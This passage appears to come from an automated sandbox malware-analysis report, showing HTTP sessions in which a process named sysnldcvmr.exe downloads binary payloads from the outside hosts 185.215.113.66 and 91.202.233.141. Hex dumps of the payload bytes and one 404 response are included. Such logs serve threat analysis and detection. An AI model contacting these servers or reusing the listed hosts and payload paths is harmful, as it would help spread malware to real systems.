                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671530962 CET1236INData Raw: 35 fc a7 92 95 53 1b bd be 53 52 be 4b a2 f4 82 88 c5 e0 4b a2 af a1 30 22 42 1c 70 38 09 c4 ed 62 8b 0b 7a e7 ad 93 f0 25 76 c4 30 06 7b 6b db 2d 2c cc 58 d9 fd 19 8d 71 9c 6d 8e 12 ec 85 49 0b 1b a1 03 a7 23 77 0e 7a 39 b9 70 a8 f3 9f 2c 8a c1
                                                                                                                                                                                                                                                  Data Ascii: 5SSRKK0"Bp8bz%v0{k-,XqmI#wz9p,^[|KVWQ-r)7/ C(<z@.&>Lh<#*Ija5_+8hPc aI>:XEL[ V;x)Yvz
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671544075 CET1236INData Raw: b5 16 89 e3 1a 92 1a f4 78 e0 97 b7 e5 c1 60 1d eb c5 3b 84 e4 1e cb e2 b8 ff 4e 3c 21 ef 9b e6 50 2d c1 1c 89 ea e3 5b 8f 98 3c 42 dd 56 f3 08 de 0c b9 d3 fb f9 f7 29 da c4 bf 5d e7 dd 09 93 ce d2 7a 1a 86 dc 5b 79 96 d2 25 f9 47 56 18 c6 3a 5e
                                                                                                                                                                                                                                                  Data Ascii: x`;N<!P-[<BV)]z[y%GV:^X!$`T;(9zdg |IlC#m"k/C*%sQuyrdnV(b{"yM7BaEm*G$bjW\1jNNCB@[9R6".r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671721935 CET1236INData Raw: 00 a1 16 37 3d 44 c0 a0 ef a7 16 10 82 2f 33 39 99 1f 28 39 c9 fd 58 25 5d 10 ee 16 5a a7 07 0b f5 47 cf c0 1e b5 71 15 4d 3b b2 54 f3 0d 09 b5 eb 45 b5 2e d6 6e ba d2 c3 af 5b 9b 92 25 60 c4 c8 08 61 bf 8a 98 0d 77 56 4a d9 ce 56 88 75 59 48 c0
                                                                                                                                                                                                                                                  Data Ascii: 7=D/39(9X%]ZGqM;TE.n[%`awVJVuYHZtpcARt&IY-/smX-_t5~a*ajW!kOkZ*S>8BN9]74D}YzRrSEZWlG^7}
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671773911 CET1236INData Raw: 2e 76 8e aa b6 5d 84 18 8b 82 44 a6 5b 88 96 e0 fa 83 ea 50 e6 1c 59 9a 9a 8c 13 1d ba 1a f7 99 01 e9 d5 f9 c4 c4 e4 a1 99 b6 d3 63 05 43 e3 f0 a7 5e f2 e6 69 09 ec 94 26 7d 32 7b 32 70 34 91 a9 60 af 2d 02 c6 96 b6 fb 9c c3 23 d7 d8 cd 4c a1 c9
                                                                                                                                                                                                                                                  Data Ascii: .v]D[PYcC^i&}2{2p4`-#LlYjRO;AbsD!Y.FGMB-:Y.-:.xAV5iEARg"CS8e+-\GxB y94HefHfq(W{?zH
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671787024 CET1236INData Raw: e9 62 ef 74 5b 2c d4 1d ab ff 8b ed d4 be 2d 7a ec ba 23 33 25 61 bb 9b 57 d5 be c9 a4 b6 85 19 88 0d 0c be 9c 70 53 cb b8 2d 6d 84 12 1c 66 da cb 83 36 40 d7 50 d4 a0 9a 18 4c 40 cf fe 2b a2 35 a8 7f 19 c6 e3 30 5f f2 25 2a 6d d4 0e a4 db 89 ea
                                                                                                                                                                                                                                                  Data Ascii: bt[,-z#3%aWpS-mf6@PL@+50_%*m;Og>y*{3yq~ZxTRb0WoD!BGcSM>sEDo@(6u?xY@T}TUhZ24"@G>YO1nqk>sY"U2
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.671801090 CET1236INData Raw: 51 02 c8 ab 69 23 ff 9f 99 33 10 ca 2e c7 8e 3a dc 10 d6 42 3f 81 14 df 10 e5 66 f6 af ab 63 af 18 b0 74 4f 17 d5 b3 c2 e0 93 97 83 47 c3 7e 96 36 5a 94 be 65 b8 9a 82 09 c0 3f bf 66 81 ad 05 b3 7d 30 f1 1a 34 4e a5 05 32 78 b4 83 f5 21 7e d2 66
                                                                                                                                                                                                                                                  Data Ascii: Qi#3.:B?fctOG~6Ze?f}04N2x!~foTibiCMztDmKHjTu[7[wA=CI[Fo(Hl:eM@87!DRl[_x(4PYo4D<l1~Wp7xu; 5
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:42.792886972 CET1236INData Raw: 11 b1 b6 17 db 8b 0c e4 5e 87 a9 e2 cf 1b 4d e6 5f c7 cb d3 51 51 da b4 9f 32 1b 11 86 4a 5e 61 b0 1b 46 de ba ad bb 8e 3a db 30 cb f0 fe 6c 8a a3 c1 c1 bb cc 2e 2a 60 c3 25 f4 29 9f cf 33 d0 78 ec 2e e6 1b 59 f4 95 78 82 9c d3 6a 44 a7 80 f7 0a
                                                                                                                                                                                                                                                  Data Ascii: ^M_QQ2J^aF:0l.*`%)3x.YxjD"}%WDyVxPPVP[wkXahRq^Uni2],F>PWh:1ja(,arx_+uJ]({P!*^jLPPo>x


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  26192.168.2.1150028185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:44.955337048 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277050972 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:46 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277100086 CET1236INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
                                                                                                                                                                                                                                                  Data Ascii: 1a@ #o;R`_|#|H%0SH9~`aa-1gH)2sLGnc <k[63N"O"Aer^1F.D[`\O5D}+aL.A`}4)wx#0J!8{(dw!DJ;hz|d
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277110100 CET248INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                                                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277751923 CET1236INData Raw: 94 73 8b aa f1 ce f6 fb 4d 3d f8 d5 0b 49 73 ea 19 24 fd 61 5a a1 ae 74 26 ce d4 c3 49 ba b6 a2 ff c7 ce 44 2e dc 20 cb 01 b2 a5 4d 7a d3 11 4c 32 a9 c1 56 37 18 06 0b 04 2a e4 ea 08 83 e9 51 49 0a ba bc b0 d1 a9 c4 8f 89 af 0e 75 b2 3b b5 35 bb
                                                                                                                                                                                                                                                  Data Ascii: sM=Is$aZt&ID. MzL2V7*QIu;5f;kIB*w%zH-L=_k_/ipMf`N cNk^uHt(_fE:J*{O&~p^oUA4VUM@^28*Bb_Fk
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277821064 CET1236INData Raw: 78 1f b9 71 14 f8 5a 8e f8 e4 b5 04 49 01 a7 1a aa 0a e0 af 5e ac f8 9e 1d 6c 78 e5 c4 c6 c0 41 95 60 5f 7d 4b c6 63 80 8b 37 a8 fc b8 f2 e1 61 52 18 dd 8c cb b2 0b fc ef 6b c0 2f 3b 05 56 18 b0 29 28 39 21 95 0d 55 7d 8b 91 68 e8 e8 e9 73 f2 84
                                                                                                                                                                                                                                                  Data Ascii: xqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3aia>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(ou
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.277829885 CET248INData Raw: 87 9c b7 44 2a f2 35 40 6d 77 32 c0 f8 65 a2 d2 24 fd 85 98 0a 2a de 08 ee 92 f4 29 7c 0f 13 14 55 30 42 e3 ee db 7b 77 f4 01 cc 78 7a 77 b9 64 06 d5 0a d3 04 b1 6f 0b ff 86 e6 69 1c 34 0b 7c 4a 1d fd 58 a5 96 f8 a3 c7 4f 1b 2c d4 73 5e 49 cb 81
                                                                                                                                                                                                                                                  Data Ascii: D*5@mw2e$*)|U0B{wxzwdoi4|JXO,s^I@Vs>?'/<AILTO8Jt)0ZbA,3Po+(v"!h3UIIgh|>_C+]`OG3de{tlnAj}xA
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.278649092 CET1236INData Raw: a3 6b 02 48 8e 39 47 cb 09 12 56 19 ec 5e 7a 6d 54 eb 7b ef c8 d8 b1 79 fc 3b fe 63 e7 7d 77 92 33 70 bb a9 52 ff 00 fa 79 3c 56 3d c6 35 ea 61 b9 80 1f 3d c3 f3 7f 0a a8 e1 64 a5 95 55 f8 59 8c 57 e8 9e 8e e9 2d d9 da e4 58 57 f2 b6 87 e0 f2 cd
                                                                                                                                                                                                                                                  Data Ascii: kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P1~#wRpvTW$Kz{]ok>IXj@U;[h`(LjmG#*Opr[w9]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.278682947 CET1236INData Raw: ba 43 e5 3b ee 40 fb 35 38 a6 dc 48 a9 74 7d 75 c7 86 f5 b7 6f 73 e8 b1 fa 28 92 95 a5 68 91 da 2f 52 fd 82 ed 91 b8 fb 81 ee 23 60 71 fe a0 6b 98 15 f1 9f 31 a6 e9 23 61 5f 4a 78 3b 4a b9 9c 4f 29 6a c5 20 3c 53 b0 e3 07 e2 0a 1f 90 6d 8e 03 50
                                                                                                                                                                                                                                                  Data Ascii: C;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$ZvN?|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.278693914 CET248INData Raw: fb d4 0c e1 da 53 a5 a4 95 56 4b 73 89 9c 6b 68 40 74 c8 fd 28 54 21 a1 a5 ba 13 c0 e5 2b 78 b5 0f 09 01 aa 52 3c 08 8e 21 65 cc d8 5f ea 95 b2 7b 8f d5 29 3b b1 b0 24 cb 00 32 1e f0 e3 e0 34 53 09 8f 17 38 71 fb 95 d1 d2 95 09 1a 89 77 b6 6a 18
                                                                                                                                                                                                                                                  Data Ascii: SVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN},@83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-o[9}@Gg~@kk3;w
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.279757977 CET1236INData Raw: 3c e2 ef 0d 30 a3 a8 20 58 36 14 47 05 6a 36 aa 91 62 83 85 a2 06 91 02 fd 9f 8f c5 31 c7 54 90 84 32 3c fb 3d 04 03 e9 64 4d 70 cb d1 16 ae fa a1 ff 2e 88 d6 9f a3 a1 a0 74 06 d6 c7 2f 3e 2c 09 83 0f 8a 37 11 07 89 48 44 29 a3 e5 10 ae 61 2c 06
                                                                                                                                                                                                                                                  Data Ascii: <0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>kl@yNvf%[;K=x"Le%!;S4Tda(W=#8Nirp:2AJrc0nt@5
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:46.396986008 CET1236INData Raw: 73 3f c8 70 a0 b1 a5 99 ee 13 69 d1 fa 12 73 bb ba 00 95 62 62 eb 4d 88 09 c5 cd df 9e bb eb 46 1a 12 02 08 16 76 51 53 45 40 15 d9 9e d5 6c 9f 07 3d ef 29 16 30 78 22 a5 fa 2e 9a 81 17 cb 93 ef 9b c3 87 ab f8 1a 0e 2f 3c ad 0a 1f 78 26 9f 2b a0
                                                                                                                                                                                                                                                  Data Ascii: s?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9(7~GF3fx@fxR6;T4 P-.!HAGl'D7vRo"_x|zi,XBj->[yoXo.!t:4|


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  27192.168.2.1150031185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:48.510323048 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902345896 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:49 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 66816
                                                                                                                                                                                                                                                  Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "6751d253-10500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:*^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57*= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA|?g}o k?Z5nD8E%|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b|S,Z?9C&]:jE>90F]qj(>rXn{v^e
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902363062 CET1236INData Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c
                                                                                                                                                                                                                                                  Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr3G<d4LV$@M<_dT|,g+U[zh^PI_wQvVs|nXaGIr30pZYz]>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902373075 CET1236INData Raw: a9 48 83 d2 10 f4 b5 8a 35 25 2e 77 45 f8 5d 3f 91 e1 2b a7 1a ab 43 6e ba f5 88 8a b7 01 06 21 4e 06 67 b5 98 56 96 0b 75 8b 11 70 97 42 33 77 ee 76 44 11 f4 b7 76 6b b7 15 ef 25 c1 80 a8 eb 2a ae 34 6f d4 65 d7 ff 02 e9 4b b4 7d 78 99 87 5f 14
                                                                                                                                                                                                                                                  Data Ascii: H5%.wE]?+Cn!NgVupB3wvDvk%*4oeK}x_UzOqUR3<mi659wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902386904 CET1236INData Raw: 08 e2 42 7b 64 54 85 29 7e 35 15 93 c2 d3 c8 02 11 06 ed 8f 60 73 21 07 d0 5a 5b 39 e8 df 93 eb 85 4a 10 b4 32 a3 0e a6 31 81 7e da 45 d1 93 37 a8 3d b3 9a ef 2b 82 34 4c a8 67 bf c1 ed 20 df fb 7a 8c 4f 36 3b f3 43 fd 01 d7 3b da 75 3d 17 4e 03
                                                                                                                                                                                                                                                  Data Ascii: B{dT)~5`s!Z[9J21~E7=+4Lg zO6;C;u=NaXc/q|"I&DF0<=aAlVvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902494907 CET1236INData Raw: 00 48 c6 4e d1 e6 8b 16 03 63 01 1e 1d 35 f0 a3 13 6d d4 42 50 24 54 97 af c1 86 92 4d dc 45 ee 1c dd 3f 98 54 8b c9 b0 00 61 92 15 12 b7 8f a2 b2 f8 6d 01 1e 74 6e fc 4c 73 b0 2a 72 28 b5 ba a0 d0 11 1a 0b 59 1c 0a 4e 7e a5 c9 f8 49 2a 87 fb e4
                                                                                                                                                                                                                                                  Data Ascii: HNc5mBP$TME?TamtnLs*r(YN~I*$>f-~4~E97#m+m32K1VW[u[LdTqwSO(@0i[3ZUZg+o6E"Z[oxd31oH"#$%7H_
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902506113 CET1236INData Raw: f7 ed 6c e6 2b 92 fb d5 d9 48 48 81 54 83 0c 26 13 f7 a5 8a fc 0e 4b 99 a8 a1 ac b7 45 18 0a c0 e8 fe 5a 95 8a a1 44 9b 71 2a 59 74 32 83 e3 1d e3 6a 92 82 01 7d 2c c6 5b bf 85 7b aa c1 56 51 73 ef e3 00 f9 80 fa e0 98 27 f8 0f dd 7e 80 23 d5 53
                                                                                                                                                                                                                                                  Data Ascii: l+HHT&KEZDq*Yt2j},[{VQs'~#Sat>A?O.<3~.Y8Xos_w'kioyg<^ FTAI93|tKRN2 &<R]G{|lL?Mg;~Idz7?:`X
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902515888 CET1236INData Raw: e4 d9 48 33 cc 3d 1b b8 84 7c 7d e1 4f 43 c2 70 8c 0b fd 96 2d c4 be 29 a5 30 d7 0c f5 c5 46 e2 d6 dc 01 b6 85 96 59 d1 1f b1 31 e4 8e 7e 84 20 00 68 f7 c1 f6 6d ac d2 10 98 42 d8 96 5c d4 3d 22 2b 98 0f f5 09 df 98 9b 76 cb a7 0d 9e d0 d4 90 b7
                                                                                                                                                                                                                                                  Data Ascii: H3=|}OCp-)0FY1~ hmB\="+v_:Jh2i5=QwsyMlrBJdj9j&,}dUe>)hx:P]T4|etM')[f7&,7vd_Z!)"Ulb\S*5Kk}l
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902529955 CET1236INData Raw: 09 7d 50 fe 2e a6 8d bc 67 5c c1 78 de 53 d2 be 19 21 38 21 b5 8d 60 93 df bd 7e 5e f5 11 47 09 4d 50 a4 df a8 af f0 62 d7 37 db 1c f7 44 db ac 1b 6c a6 08 74 a7 4c 7e 62 41 14 37 81 f5 08 18 2a 55 f2 93 27 fb 7c aa a5 4e de 31 a7 a2 4d 78 5f 06
                                                                                                                                                                                                                                                  Data Ascii: }P.g\xS!8!`~^GMPb7DltL~bA7*U'|N1Mx_'^em'-i AeG: b*SrK;|j!a.v!I9|Q#4'vZc"_2NI?~NwDa"A%i&T!51py:=(lTzl
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902605057 CET1236INData Raw: 34 64 0d fc f6 7d fc dc 47 24 4f 66 80 41 d1 d5 37 59 6d 4a 44 0b a4 f4 eb 61 2b 94 a3 a3 24 a7 3e 38 ef fe bf da 99 04 51 4f 6f 5f 25 92 4e fb 8c 7e 75 48 e3 65 87 05 78 d4 d9 2f 0e 6e 7d 4d fb 58 c6 7e 80 b9 3f 4a ca 6b 21 5b f4 19 0e 11 44 7f
                                                                                                                                                                                                                                                  Data Ascii: 4d}G$OfA7YmJDa+$>8QOo_%N~uHex/n}MX~?Jk![DA Yc_zmE_9*ay~}'t:8J5FDb]:1J79q)xx3R#I+l_xx6J)c^E2BB;C^n(W<Mp
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:49.902676105 CET1236INData Raw: 89 8a cb e6 fe f3 e4 57 5f c5 58 2e fe 5a 83 32 3c e9 62 58 f5 81 62 4f 2b b1 28 00 ce 93 76 b2 3e 45 fb a2 aa ad 90 7f b9 2e a2 a5 20 44 7e b8 13 15 9d 27 08 25 0a ec 79 36 34 2e 01 15 1d 70 a3 25 50 53 fd 5a 80 4e e1 7a a0 2e c9 ca a7 bc b6 3f
                                                                                                                                                                                                                                                  Data Ascii: W_X.Z2<bXbO+(v>E. D~'%y64.p%PSZNz.?KS?s)41=5;k],SuYe+`KO5J_ra3"Tz?/"(x9<4M{mU{DZs?)1h2?k3Z<h
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:50.022286892 CET1236INData Raw: 1b 54 54 0c a5 35 62 04 25 17 fb a1 5a c1 20 4e 9e f5 1a a9 dc 9e 69 2a 6d f3 3c 60 8c 8c 66 ce 7b 19 74 86 28 6f 53 21 79 da 1e cf 5e 12 bd ec 5a 9c bd 51 fb 2c cd f4 0c 1c ef e8 e8 84 4c 17 1c f3 dc 0e 11 43 b4 8b 87 90 b9 33 0a f5 81 1b b5 da
                                                                                                                                                                                                                                                  Data Ascii: TT5b%Z Ni*m<`f{t(oS!y^ZQ,LC3=aZLTGa3U@>=j%$W#~{z"I|r=H*p2@YDiVa$9(i9}MDD2~5k^ACeHCG+]"GB9s}Ozt


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  28192.168.2.115003391.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:53.301632881 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:33:54.656107903 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:33:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
